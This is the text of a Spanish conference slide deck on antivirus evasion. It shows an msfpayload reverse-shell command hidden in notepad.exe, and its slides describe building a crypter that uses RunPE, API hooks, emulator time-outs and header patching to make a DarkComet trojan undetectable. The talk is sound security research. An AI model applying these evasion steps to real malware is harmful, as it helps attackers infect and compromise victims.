Charla Desmitificando el AntiVirus en NoCONName 2104 NcN2k14. Técnicas de evasión de antivirus. Creación de un Crypter en C Demo: * Pruebas crypter * Ataque ingenieria social: email+word con macro (downloader de Malware protegido con crypter FUD) Video 1/ http://youtu.be/wPPmRgQNF24 * Ataque 0day con Sandworm (powerpoint) Video 2/ https://www.youtube.com/watch?v=5hJddep-y80 Video 3/ https://www.youtube.com/watch?v=gZAndZB0Jqk

1. Desmitificando el AntiVirus
Desmitificando el
AntiVirus
#NcN2k14 Abraham Pasamar (@apasamar)

2. Whoami
Sobre mi:
Abraham Pasamar @apasamar
CEO Inci e apasamar@incide.es
www.incide.es PGP key ID:
0x3ee5fcf7693108b4
d
+10 años seguridad
Computer Forensics
Incident Response
Expert Witness
Pentesting
PASSWORD:
1234567
#NcN2k14 Abraham Pasamar (@apasamar)

3. Efectividad de los Antivirus
Evasión de Antivirus
Crypters C Crypter
DEMO
#NcN2k14 Abraham Pasamar (@apasamar)

4. Agradecimientos
#NcN2k14 Abraham Pasamar (@apasamar)
Jose Selvi
Abel Gómez
camisetasfrikis.es
Vrillon/Venon
Creative Commons

5. Antivirus
#NcN2k14 Abraham Pasamar (@apasamar)

6. Antivirus
#NcN2k14 Abraham Pasamar (@apasamar)
¿Nos protegen?
Sí
¿Hasta qué punto?
Todo lo que pueden
respecto de las ‘infecciones’ comunes
y lo que pueden ‘prever’

7. Ataque dirigido (APT)
Cybercriminales
¿Nos protegen?
No mucho
Las técnicas de ‘Detección’ de los AVs actualmente son insuficientes
Las defensas convencionales son insuficientes
#NcN2k14 Abraham Pasamar (@apasamar)

8. Ataque dirigido (APT)
Cybercriminales
¿Nos protegen?
No mucho
Las técnicas de ‘Detección’ de los AVs actualmente son insuficientes
Las defensas convencionales son insuficientes
#NcN2k14 Abraham Pasamar (@apasamar)

9. Press
#NcN2k14 Abraham Pasamar (@apasamar)
Brian Dye, CEO de Symantec
mayo 2014
Paradigma ha cambiado —> protección AV host/perimetro es insuficiente

10. AV: ¿Cómo funcionan?
Escanean binarios en el DISCO
¿Escanean en MEMORIA? algunos y poco :(
Buscan FIRMAS @ AV BBDD
Buscan TÉCNICAS MALICIOSAS (heurística)
EMULADOR (ejecución parcial) Tiempo Real
#NcN2k14 Abraham Pasamar (@apasamar)

11. ¿Por qué evadir AV’s?
BAD GUYS:
MALWARE = $$$$$$$
Botnets, Ransomware, …
GOOD GUYS:
#NcN2k14 Abraham Pasamar (@apasamar)
APT
Auditoría, Pentesting

12. ¿Cómo evadir AV’s?
Encoders
Packers
Crypters
msfpayload windows/shell/
reverse_tcp LHOST=192.168.1.75
LPORT=4444 R | msfencode -c 5
-e x86/shikata_ga_nai -x
notepad.exe > notepad2.exe
#NcN2k14 Abraham Pasamar (@apasamar)

13. ¿Cómo evadir AV’s?
Encoders
MALWARE suele ser una pieza compleja.
Packers
Crypter es mucho más simple.
Permite proteger malware detectado.
Crypters
msfpayload windows/shell/
reverse_tcp LHOST=192.168.1.75
LPORT=4444 R | msfencode -c 5
-e x86/shikata_ga_nai -x
notepad.exe > notepad2.exe
REUTILIZACIÓN
TIP:
Método Público = MAL
Método Privado = BIEN
#NcN2k14 Abraham Pasamar (@apasamar)

14. ¿Información sobre Crypters?
Papers
“Abusing File Processing in Malware Detectors for Fun and
Profit” (2012)
Suman Jana and Vitaly Shmatikov
The University of Texas at Austin
“Bypassing Anti-Virus Scanners” (2012)
InterNOT Security Team
#NcN2k14 Abraham Pasamar (@apasamar)
“Hyperion:
Implementation of a PE-Crypter”(2012)
Christian Ammann
http://www.nullsecurity.net/
“One packer to rule them all: Empirical identification,
comparison and circumvention of current Antivirus detection
techniques”(BruCON 2014)
Arne Swinnen,Alaeddine Mesbahi

15. Foros Underground
#NcN2k14 Abraham Pasamar (@apasamar)
Manuales
Video-Tutoriales
Binarios
Código
Herramientas
Multi AV-Scanners
Enlaces:
http://www.indetectables.net
http://www.udtools.net
http://www.masters-hackers.info
http://www.level-23.biz
http://www.corp-51.net
http://www.underc0de.org

16. ¿Qué es un Crypter?
Software creado para ocultar código malicioso y hacerlo
indetectable a los antivirus (FUD)
STUB
MALWARE DETECTADO
XOR, RC4, ...
MALWARE CIFRADO
#NcN2k14 Abraham Pasamar (@apasamar)
CRYPTER
(Builder)
STUB
CRYPTER + STUB
exe
dll
recurso

17. Builder / Stub
B u i l de r:
S e e n c a rg a de c om p o n e r e l
n ue v o e je c u t a b l e .
B u i l de r (M a l wa re De te c t a d o) =
St u b + M a l wa re C i f r a d o
St u b:
S e e n c a r g a de :
* De s c i f r a r e l M a l wa re C i f r a d o
* Ej e c u t a r l o d i re c t ame n t e e n
me m o r i a s i n q ue e l M a l wa re
t o q u e e l d i s c o
P i e z a más i m p o r t a n t e
S e e n f re n t a a l o s AV’s
#NcN2k14 Abraham Pasamar (@apasamar)

18. RunPE o Dynamic Forking
CreateProcess
EP 2 ReadFile WriteProcessMemory
#NcN2k14 Abraham Pasamar (@apasamar)
PROCESO
1
(CREATE_SUSPENDED)
GetThreadContext
EP I
PEB EBX
EAX
1
+8 PROCESO
2
BaseAddress 2
ResumeThread SetThreadContext

19. Let’s code a C Crypter
#NcN2k14 Abraham Pasamar (@apasamar)
Builder
MALWARE
STUB MALWARE CIFRADO
C O N T E N E D O R

20. Let’s code a C Crypter
RUTINA DE CIFRADO
#NcN2k14 Abraham Pasamar (@apasamar)
Builder

21. Let’s code a C Crypter
STUB+FIRMA+MALWARE CIFRADO
#NcN2k14 Abraham Pasamar (@apasamar)
Builder

22. Let’s code a C Crypter
Descifrado (decryptbuffer=XOR[buffer])
#NcN2k14 Abraham Pasamar (@apasamar)
Stub
Localizar la FIRMA SEPARADORA

23. Let’s code a C Crypter
Arrancar el proceso en memoria
(Dynamic Forking)
CreateProcess (CREATE_SUSPEND)
#NcN2k14 Abraham Pasamar (@apasamar)
Stub
Estructuras cabecera ejecutable
WriteProcessMemory
ResumeThread

24. Let’s SCAN the Crypter
Multi AV SCAN
#NcN2k14 Abraham Pasamar (@apasamar)
TROJAN SERVER
(Darkcomet). SIN CRYPTER
TROJAN SERVER CRYPTED
(stub+[crypted Darkcomet])

25. Improving the Crypter
:( 13 Signatures … ¿ Qué podemos hacer ?
API HOOKS :)
GetProcAddress
#NcN2k14 Abraham Pasamar (@apasamar)

26. Let’s SCAN the Crypter
Multi AV SCAN
V1 - Original Crypter V2 - API Hooks
#NcN2k14 Abraham Pasamar (@apasamar)

27. Improving the Crypter
Añadiendo soporte para parámetros
main —> WinMain (nCmdLine)
#NcN2k14 Abraham Pasamar (@apasamar)

28. Improving the Crypter
Cambiando la rutina de cifrado
XOR —> byte SWAP
#NcN2k14 Abraham Pasamar (@apasamar)

29. Let’s SCAN the Crypter
Multi AV SCAN
V2 - API Hooks V3 - Parameters & byte Swap
Ooohhh!!!
#NcN2k14 Abraham Pasamar (@apasamar)

30. Improving the Crypter
FIRMAS indican HEURISTICA
¡¡¡ Matemos las firmas heurísticas !!!
Exhausting routine
Emulador —> Time Out
ANTIVIRUS SANDBOX
REAL TIME DETECTION
No es posible procesarlo en tiempo real
#NcN2k14 Abraham Pasamar (@apasamar)

31. Let’s SCAN the Crypter
Multi AV SCAN
V4 - Exhausting Routine
V3 - Parameters & byte Swap
OH YEAH !!!
#NcN2k14 Abraham Pasamar (@apasamar)

32. Improving the Crypter
FIRMAS Estáticas
AVAST
Método de cifrado
Variante: SWAP +/- 1
#NcN2k14 Abraham Pasamar (@apasamar)

33. Improving the Crypter
FIRMAS Estáticas
AVIRA
Firmas Cabecera (CRC/clusterización) - FLAGS Sección
CAMBIAMOS FLAGs
VALOR NO ESPERADO
#NcN2k14 Abraham Pasamar (@apasamar)

34. Let’s SCAN the Crypter
Multi AV SCAN
V4 - Exhausting Routine V6 - Cifrado+ & patch Flags
Awesome!!!
#NcN2k14 Abraham Pasamar (@apasamar)

35. DEMO
Crypter en C (FUD)
Probarlo en un ataque
Ingeniería social (1 click)
Word + Macro (downloader)
Sandworm (0 clicks)
Ejecución FUD-Trojan en TR
#NcN2k14 Abraham Pasamar (@apasamar)

36. Conclusiones
Bypass AVs es POSIBLE
—-> Compromiso INFORMACIÓN
Necesario prestar atención al COMPORTAMIENTO
Algunos elementos a considerar:
Perímetro (callbacks C&C)
SANDBOX
Contexto
#NcN2k14 Abraham Pasamar (@apasamar)

37. Imágenes
Banco Imáges Propio
http://www.gratisography.com/
http://broadbandandsocialjustice.org/
Flickr, user: eviltomthai
Chiswick Chap - Own work
#NcN2k14 Abraham Pasamar (@apasamar)

38. Gracias
apasamar
INCIDE
Avda. Diagonal, 640 6ª Planta
08017 Barcelona
info@incide.es
http://www.incide.es
1NC1D3
http://www.incide.es/blog-incide/
http://www.youtube.com/incidetube
Companies > INCIDE - Investigación Digital
Tel./Fax. +34 932 546 277 / +34 932 546 314
#NcN2k14 Abraham Pasamar (@apasamar)